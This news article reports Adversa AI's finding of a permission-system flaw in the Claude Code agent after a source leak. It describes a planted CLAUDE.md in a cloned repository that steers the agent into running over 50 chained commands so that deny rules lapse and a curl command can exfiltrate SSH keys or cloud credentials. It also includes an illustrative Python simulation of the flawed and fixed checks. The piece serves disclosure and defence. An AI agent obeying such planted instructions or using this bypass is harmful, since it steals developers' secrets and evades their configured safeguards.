
Claude Code leak: Researchers find first vulnerability

Notebookcheck | Marc Herter (image: Anthropic)
Shortly after an accidental source code leak, a critical vulnerability was discovered in the AI coding agent called Claude Code. It potentially allows attackers to bypass security safeguards and steal sensitive data from developers.

On March 31, Anthropic, the company behind the Claude AI, accidentally put a large portion of the code behind the Claude Code coding agent online. Since then, Anthropic has been trying to take action against copies of that code. Analysts have already found some information in the code that is potentially awkward for Anthropic. That includes the YOLO protocol.

Although no model weights were affected by the leak, it provides a detailed blueprint of how the tool works. This makes it easier for potential attackers to identify targeted vulnerabilities or to create highly convincing copies of the program that could spread malware. Against this backdrop, the team at Adversa AI has discovered a critical security flaw in Claude Code’s permission system.

Claude Code is a terminal-based assistant that works directly in the command line and can edit files as well as execute shell commands. To maintain security, the tool uses a system of permission rules. Users can define so-called deny rules that strictly block certain commands, such as the command "curl," which is used to transfer data over a network. Other commands such as "git" for version control can, by contrast, be explicitly allowed.

The discovered vulnerability lies in the handling of complex command chains. To avoid performance issues and UI freezes, Anthropic limits its detailed security analysis to a maximum of 50 subcommands. If a command chain is longer, the individual checks are skipped and a general prompt is shown to the user asking whether the command should be executed.

This behavior could be exploited through prompt injection. In this type of attack, an attacker manipulates the AI’s inputs in order to bypass its security filters. Specifically, an attacker could place a manipulated file named "CLAUDE.md" in a public software repository. This file contains instructions for the AI agent. If a developer clones the repository and asks the agent to review the project, the AI could be instructed to execute a chain of more than 50 seemingly legitimate commands.

Starting with the 51st command, the individually configured deny rules no longer apply. While a single "curl" command would be blocked, it is ignored when embedded in a long chain. This allows attackers to send sensitive data such as SSH keys (the cryptographic keys used for secure remote access to servers) or cloud credentials from the developer’s local machine to an external server in the background. Because the system in this case only requests a general confirmation, the user does not notice that their security policies have effectively been overridden.

Particularly notable is that the leaked source code for version 2.1.88 already contained a fix for this problem. Anthropic had developed a newer parser (a component that analyzes the structure of code) that correctly checks deny rules regardless of the length of the command chain. However, this was not enabled in the public versions of the program. Instead, the older, flawed mechanism continued to be used.
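To make the failure mode described above concrete, here is a small simulation of the two permission checkers the article contrasts: the old one, whose per-subcommand analysis stops after 50 subcommands and falls back to a generic prompt, and a hardened one that evaluates deny rules over every subcommand before any length-based shortcut. This is an added illustration written for this page, not Claude Code's own code or Adversa AI's research code; the rule names, the verdict strings, the chain splitter and the sample command chain are all assumptions constructed for the example.

```python
"""Simulated deny-rule evaluation for a shell command chain.

Models the behaviour the article describes (detailed analysis capped at 50
subcommands, generic prompt beyond that) next to a checker that applies deny
rules regardless of chain length. Everything here is a simplified model
written for illustration; it is not Claude Code's implementation.
"""
import re

MAX_ANALYZED_SUBCOMMANDS = 50        # cap described in the article

DENY_RULES = {"curl"}                # assumed: commands that must never run
ALLOW_RULES = {"git", "echo"}        # assumed: commands allowed without asking

# Chain operators we split on: && || ; and |
_CHAIN_SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def split_chain(command: str) -> list[list[str]]:
    """Split a command chain into argv-style subcommands.

    Deliberately simplified: a real shell grammar (subshells, quoting,
    redirections, command substitution) is far richer than this splitter.
    """
    pieces = _CHAIN_SPLIT.split(command)
    return [piece.split() for piece in pieces if piece.strip()]


def _command_names(subcommands: list[list[str]]) -> list[str]:
    # Matching on the first word only is itself a simplification; wrappers such
    # as `env` or `sh -c` would need to be unwrapped by a real policy engine.
    return [argv[0] for argv in subcommands if argv]


def legacy_check(command: str) -> str:
    """Flawed behaviour: deny rules are consulted only for short chains."""
    subcommands = split_chain(command)
    if len(subcommands) > MAX_ANALYZED_SUBCOMMANDS:
        # Per-subcommand analysis is skipped entirely; the user just sees a
        # generic "run this?" prompt and the deny list is never consulted.
        return "ask_generic"
    names = _command_names(subcommands)
    if any(name in DENY_RULES for name in names):
        return "deny"
    if names and all(name in ALLOW_RULES for name in names):
        return "allow"
    return "ask"


def hardened_check(command: str) -> str:
    """Deny rules are a cheap set lookup, so apply them to every subcommand
    before any performance-motivated shortcut; only the expensive part is capped."""
    subcommands = split_chain(command)
    names = _command_names(subcommands)
    if any(name in DENY_RULES for name in names):
        return "deny"
    if len(subcommands) > MAX_ANALYZED_SUBCOMMANDS:
        return "ask_generic"          # still a prompt, but never bypassing deny rules
    if names and all(name in ALLOW_RULES for name in names):
        return "allow"
    return "ask"


# Constructed sample input: 55 harmless subcommands followed by one denied
# command, so the chain is longer than the 50-subcommand analysis cap.
LONG_CHAIN = " && ".join(f"echo step {i}" for i in range(1, 56)) + " && curl example.invalid"
SHORT_DENIED = "git status && curl example.invalid"
SHORT_ALLOWED = "git status && echo done"


def compare(command: str) -> dict[str, str]:
    """Return both verdicts for one chain, for side-by-side inspection."""
    return {"legacy": legacy_check(command), "hardened": hardened_check(command)}


if __name__ == "__main__":
    for label, chain in (("short, denied", SHORT_DENIED),
                         ("short, allowed", SHORT_ALLOWED),
                         ("long chain with curl", LONG_CHAIN)):
        print(f"{label:22s} ({len(split_chain(chain))} subcommands): {compare(chain)}")
```

Running the module prints the two verdicts for each constructed chain: both checkers deny the short chain containing `curl`, both allow the short `git`/`echo` chain, but for the 56-subcommand chain the legacy checker returns only `ask_generic` while the hardened one returns `deny`. The design point is that the deny-list scan is cheap and runs first, so the performance cap only ever limits the expensive analysis, never the policy.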

Anthropic appears to have resolved the problem in the meantime. According to the changelog for version 2.1.90, an issue described as "parse-fail fallback deny-rule degradation" was fixed. However, according to the researchers who identified the potential security vulnerability, there are other ways to address the problem.

Marc Herter, 2026-04-07 (Update: 2026-04-07)